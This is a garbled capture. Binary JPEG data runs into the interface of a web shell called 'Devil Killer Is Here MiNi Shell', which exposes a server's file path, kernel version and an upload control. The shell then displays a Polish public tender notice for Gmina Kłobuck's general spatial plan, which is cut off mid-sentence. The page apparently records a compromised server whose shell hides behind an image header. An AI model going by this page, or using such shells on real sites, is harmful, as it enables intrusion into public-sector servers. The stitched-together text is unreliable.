JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240514/0032292401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sporządzenie planu ogólnego Gminy Kłobuck </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KŁOBUCK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398273</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 11 Listopada 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kłobuck</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">34 310 01 50</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminaklobuck.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.gminaklobuck.pl/main/index.html</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sporządzenie planu ogólnego Gminy Kłobuck </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0bd99cab-fc83-11ee-b016-82aaee56c84c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00322924</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00001792/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.8 Sporządzenie planu ogólnego Gminy Kłobuck</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0bd99cab-fc83-11ee-b016-82aaee56c84c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa Regulamin korzystania z Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl<br/>oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>3. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>5. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>6. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 4587799 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>7. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>sekretariat@gminaklobuck.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).<br/>8. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe w tym oświadczenie, o którym<br/>mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy,<br/>zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się<br/>w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego<br/>2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2024 r. poz. 307), z zastrzeżeniem<br/>formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych. Pozostałe zasady zgodnie z<br/>SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Pani/Pana danych osobowych jest Burmistrz Kłobucka z siedzibą ul. 11<br/>Listopada 6, 42-100 Kłobuck, tel. (34) 31 00 150, e-mail: sekretariat@gminaklobuck.pl<br/>Administrator – wyznaczył Inspektora ochrony danych – Pan Jacek Orłowski, z którym może się Pani/Pan skontaktować poprzez<br/>adres e-mail: iod@gminaklobuck.pl lub pisemnie pod adresem: 42-100 Kłobuck ul. 11 Listopada 6. Z inspektorem ochrony danych<br/>można się kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych w szczególności w zakresie<br/>korzystania z praw związanych z ich przetwarzaniem.<br/>Pani/Pana dane osobowe przetwarzane są w celu realizacji ustawowych zadań Urzędu wynikających z przepisów prawa tj.: - ustawa<br/>o samorządzie gminnym, - ustawa Prawo zamówień publicznych, - ustawa Prawo o aktach stanu cywilnego, - ustawa o zmianie<br/>imienia i nazwiska, - ustawa o ewidencji ludności, - ustawa o dowodach osobistych, - ustawa o podatkach i opłatach lokalnych, -<br/>ustawa o po-datku leśnym, - ustawa o podatku rolnym, - ustawa o wychowaniu w trzeźwości i przeciwdziałaniu alkoholizmowi, -<br/>ustawa o utrzymaniu porządku i czystości w gminach, - ustawa o gospodarce nieruchomościami, - ustawa prawo budowlane, -<br/>ustawa o planowaniu i zagospodarowaniu przestrzennym, - ustawa Kodeks cywilny, - ustawa o pracownikach samorządowych, -<br/>ustawa o Centralnej Ewidencji i Informacji o Działalności Gospodarczej (CEIDG), - ustawa o ochronie przyrody, - usta-wa o ochronie<br/>środowiska, - ustawa o publicznym transporcie zbiorowym, - ustawa Prawo wodne, - ustawa o dostępie do informacji publicznej, -<br/>ustawa Prawo geodezyjne i kartograficzne, - ustawa o rachunkowości, - ustawa o finansach publicznych, - ustawa Ordynacja<br/>podatkowa, - ustawa o zwrocie podatku akcyzowego, - ustawa Prawo oświatowe, - ustawa o usługach turystycznych, - ustawa o<br/>systemie informacji oświatowej, - ustawa o promocji zatrudnienia i instytucjach rynku pracy, - ustawa o praktykach absolwenckich, -<br/>ustawa Prawo o ustroju sądów, - ustawa o powszechnym obowiązku obrony RP, - ustawa o statystyce publicznej, - ustawa o ubezpieczeniach majątkowych i osobowych, - ustawa o ochronie praw lokatorów, - ustawa o drogach publicznych, - ustawa Kodeks<br/>Postępowania Administracyjnego, - ustawa o petycjach, - ustawa o pomocy obywatelom Ukrainy w związku z konfliktem zbrojnym<br/>na terytorium tego państwa.<br/>Podstawą prawną przetwarzania Pani/Pana danych jest: - art.6 ust.1 lit. b RODO (przetwarzanie jest niezbędne do wykonania<br/>umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed<br/>zawarciem umowy), - art.6 ust.1 lit. c RODO (przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego<br/>naAdministratorze), - art.6 ust.1 lit. e RODO (przetwarzanie jest niezbędne do wykonania zadania realizowanego w interesie<br/>publicznym lub w ramach sprawowania władzy publicznej powierzonej Administratorowi).<br/>Pani/ Pana dane mogą być udostępnione podmiotom: - upoważnionym na podstawie przepisów prawa, - przetwarzającym dane na<br/>zlecenie i w imieniu Administratora, na podstawie zawartej umowy powierzenia przetwarzania danych osobowych, w celu<br/>świadczenia określonych w umowie usług.<br/>1) Do żądania od Administratora dostępu do swoich danych osobowych oraz prawo ich sprostowania, usunięcia lub ograniczenia<br/>przetwarzania, prawo wniesienia sprzeciwu wobec ich przetwarzania oraz prawo do przenoszenia danych.<br/>2) Jeśli przetwarzanie odbywa się na podstawie zgody, do cofnięcia zgody w dowolnym momencie bez wpływu na zgodność z<br/>prawem przetwarzania, które-go dokonano na podstawie zgody przed jej cofnięciem.<br/>3) Do wniesienia skargi do organu nadzorczego tj. Prezes Urzędu Ochrony Danych Osobowych /PUODO/ ul. Stawki 2, 00-193<br/>Warszawa, gdy uzna Pani/Pan, że przetwarzanie dotyczących jej(-jego) danych osobowych narusza przepisy RODO.<br/>Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego lub organizacji międzynarodowej.<br/>Pozostałe szczegółowe informacje w rozdz. XXXII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IR.271.019.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są usługi: Sporządzenie Planu Ogólnego Gminy Kłobuck.<br/>2. Opis przedmiotu zamówienia.<br/>1) Granice opracowania: Gmina Kłobuck w granicach administracyjnych.<br/>2) Powierzchnia terenu objętego przedmiotem zamówienia: Powierzchnia Gminy Kłobuck w granicach administracyjnych –<br/>ok 130,4 km 2 .<br/>3) Zakres opracowania obejmować będzie:<br/>a) dokonanie inwentaryzacji urbanistycznej i oceny istniejącego stanu zagospodarowania terenu gminy Kłobuck;<br/>b) przygotowania projektów ogłoszeń, korespondencji, wykazów wniosków i wykazów uwag, oraz innych dokumentów,<br/>których potrzeba wyłoni się w trakcie opracowania projektu planu, zgodnie z obowiązującymi przepisami prawa;<br/>c) udział w procedurze sporządzenia Planu Ogólnego, określonej w art. 13i ust. 3 ww. ustawy oraz art. 13j, w tym w<br/>konsultacjach społecznych, o których mowa w art. 8i, 8j i 8k tej ustawy;<br/>d) przeprowadzenie strategicznej oceny oddziaływania na środowisko, w tym sporządzenie prognozy oddziaływania na<br/>środowisko projektu planu ogólnego zgodnie z przepisami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o<br/>środowisku i jego ochronie, udziale<br/>społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2023 r. poz. 1094 z późn.<br/>zm.);<br/>e) sporządzenie Planu ogólnego Gminy Kłobuck, zgodnie z przepisami ustawy z dnia 27 marca 2003 r. o planowaniu i<br/>zagospodarowaniu przestrzennym, w zakresie art. 13a ust. 4, art. 13b, 13c, 13d, 13e, 13f, 13g i 13m oraz przepisami<br/>wykonawczymi do tej ustawy, wraz z uzasadnieniem Planu Ogólnego zgodnie z art. 13h ustawy;<br/>f) opracowanie danych przestrzennych do Planu Ogólnego zgodnie z art. 67a ustawy o planowaniu i zagospodarowaniu<br/>przestrzennym oraz opracowanie dokumentu planistycznego zgodnie z dyrektywą Unii Europejskiej INSPIRE, umożliwiającą<br/>stworzenie metadanych;<br/>g) skompletowanie dokumentacji formalno-prawnej zgodnie z rozporządzeniem Ministra Rozwoju i Technologii z dnia 8<br/>grudnia 2023 r. w sprawie projektu planu ogólnego gminy, dokumentowania prac planistycznych w zakresie tego planu oraz<br/>wydawania z niego wypisów i wyrysów (Dz. U. z 2023 r. poz. 2758);<br/>h) w przypadku wystąpienia potrzeby ponowienia procedury planistycznej w wyniku stwierdzenia<br/>nieważności uchwały przez Wojewodę, ponowienie niezbędnych czynności w celu doprowadzenia<br/>opracowania objętego zamówieniem do zgodności z przepisami prawa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71410000-5 - Usługi planowania przestrzennego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował następującymi kryteriami:<br/>1) cena ofertowa – 60%<br/>2) doświadczenie projektanta – 40%<br/>2. Każdy z Wykonawców w poszczególnych kryteriach otrzyma odpowiednią liczbę punktów, wyliczoną<br/>w następujący sposób:<br/>a) cena ofertowa - wg następującego wzoru:<br/>Cn<br/>l Pc = ----- x 100<br/>Cb<br/>gdzie poszczególne symbole oznaczają:<br/>I Pc – liczba punktów,<br/>Cn – cena ofertowa najniższa spośród wszystkich rozpatrywanych i nieodrzuconych ofert,<br/>Cb – cena ofertowa oferty badanej (przeliczanej),<br/>b) doświadczenie projektanta<br/>Zamawiający w ramach kryterium „doświadczenie projektanta” będzie przyznawał<br/>dodatkowe punkty za wykazanie doświadczenia projektanta, który będzie brał udział w<br/>realizacji zamówienia i który posiada uprawnienia do projektowania w zakresie objętym<br/>przedmiotem postępowania. W związku z tym Wykonawca może uzyskać max. 100 zadeklarowanego przez Wykonawcę, w<br/>formularzu ofertowym, doświadczenia projektanta.<br/>W przypadku, gdy Wykonawca wykaże, że osoba wskazana w druku oferty, spełniająca<br/>przynajmniej jeden z warunków określonych w art. 5 ustawy z dnia 27 marca 2003 r. o<br/>planowaniu i zagospodarowaniu przestrzennym (j.t. Dz. U. z 2023 poz. 977 z późn.zm.),<br/>dysponuje doświadczeniem projektanta nabytym przy opracowaniu studium uwarunkowań i<br/>kierunków zagospodarowania przestrzennego (lub zmiany studium), dotyczących gminy<br/>liczącej minimum 15 000 mieszkańców, przyjętego uchwałą Rady Gminy i miejscowego<br/>planu zagospodarowania przestrzennego (lub zmiany planu miejscowego) dla obszaru o<br/>minimalnej powierzchni wynoszącej 100 ha, opublikowanego w Wojewódzkim Dzienniku<br/>Urzędowym, a opracowania te były wykonane przed upływem terminu składania ofert, to<br/>Wykonawca otrzyma następującą ilość punktów:<br/>- za sporządzenie jednego opracowania spełniającego w/w wymagania to wartość<br/>liczbowa ocenianego kryterium uzyskanego dla danej oferty wyniesie 25 punktów;<br/>- za sporządzenie dwóch opracowań spełniających w/w wymagania to wartość<br/>liczbowa ocenianego kryterium uzyskanego dla danej oferty wyniesie 50 punktów;<br/>- za sporządzenie trzech opracowań spełniających w/w wymagania to wartość liczbowa<br/>ocenianego kryterium uzyskanego dla danej oferty wyniesie 75 punktów;<br/>- za sporządzenie przynajmniej czterech opracowań spełniających w/w wymagania to<br/>wartość liczbowa ocenianego kryterium uzyskanego dla danej oferty wyniesie 100<br/>punktów;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolność techniczna lub zawodowa:<br/>Wykonawca winien wykazać, że dysponuje (lub będzie dysponował) co najmniej jedną<br/>osobą - Projektantem, który winien spełniać przynajmniej jeden z warunków określonych w<br/>art. 5 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (j.t.<br/>Dz. U. z 2023 poz. 977 z późn. zm.) oraz powinien posiadać doświadczenie w sporządzeniu<br/>przynajmniej jednego studium uwarunkowań i kierunków zagospodarowania<br/>przestrzennego (lub zmiany studium), dotyczącego gminy o minimum 15 000<br/>mieszkańców, który został przyjęty uchwałą Rady Gminy i przynajmniej jednego<br/>miejscowego planu zagospodarowania przestrzennego (lub zmiany planu miejscowego)<br/>obszaru o minimalnej powierzchni wynoszącej 100 ha, opublikowanego w Wojewódzkim<br/>Dzienniku Urzędowym,<br/>Uwaga:<br/>-Zamawiający dopuszcza aby ww. usługi zostały wykonane łącznie w ramach jednego<br/>kontraktu (umowy) lub oddzielnie w ramach kilku kontraktów (umów),<br/>-wskazane powyżej osoby muszą posiadać biegłą znajomość języka polskiego.<br/>W przypadku, gdy wskazane osoby nie posiadają biegłej znajomości języka polskiego<br/>Wykonawca jest zobowiązany zapewnić tłumacza(y) języka polskiego, zapewniającego<br/>stałe, biegłe i fachowe tłumaczenie w kontaktach między Zamawiającym a Wykonawcą, na<br/>okres i dla potrzeb realizacji umowy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta<br/>zostanie najwyżej oceniona, w celu wykazania braku podstaw<br/>(przesłanek) wykluczenia z postępowania, na podstawie art. 274 ust. 1 ustawy zostanie<br/>wezwany do złożenia, w terminie nie krótszym niż 5 dni od dnia wezwania, następujących<br/>podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/>1) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności<br/>do tej samej grupy kapitałowej (zał. nr 8 do SWZ) w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r. poz. 1689), z innym<br/>Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do<br/>udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej<br/>wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego<br/>Wykonawcy należącego do tej samej grupy kapitałowej.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie<br/>w zakresie ust. 5.1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>2) Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu w zakresie<br/>podstaw do wykluczenia wskazanych w ust. 2 pkt 2.1 oraz 2.2 (zał. nr 5 do SWZ).<br/>W przypadku wspólnego ubiegania się o zamówienie 